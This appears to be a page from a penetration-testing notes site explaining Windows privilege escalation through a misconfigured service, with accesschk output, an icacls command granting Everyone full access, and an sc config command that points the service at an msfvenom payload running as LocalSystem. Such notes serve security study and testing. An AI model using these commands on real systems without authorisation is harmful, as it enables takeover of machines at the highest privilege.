Insecure service permission

This vulnerability is based on the mis-configuration on the service's permission, rather than the service's executable itself.

Given a service with insecure permission allowing us to change the configurations, it can be exploited to change the executable to one defined by us.

The following command allows us to view the service permissions using the AcessChk tool:

AccessChk - Windows Sysinternalsdocsmsft

Eg. Suppose there is a vulnerable service named vuln_service:

C:\> accesschk -qlc vuln_service
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        ...
  
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

The following shows that the BUILTIN\Users group has the SERVICE_ALL_ACCESS permission, which means that any user can configure the service.

After creating an executable payload with msfvenom, and granting the appropriate permission on the created executable (usually full access (F) for the Everyone group). The associated executable and account for the vulnerable service can be updated.

To grant full access (F) to a binary for the Everyone group:

C:\> icacls [exec_binary] /grant Everyone:F

The following sets the vuln_service service associated executable to the attacker created path, and the account to LocalSystem (highest privileged account available).

C:\> sc config vuln_service binPath= [path_to_exec_payload].exe obj= LocalSystem

Take note of the space after the equals sign (=) for the options passed to the sc command

PreviousUnquoted service path NextAbusing privileges

Last updated 5 months ago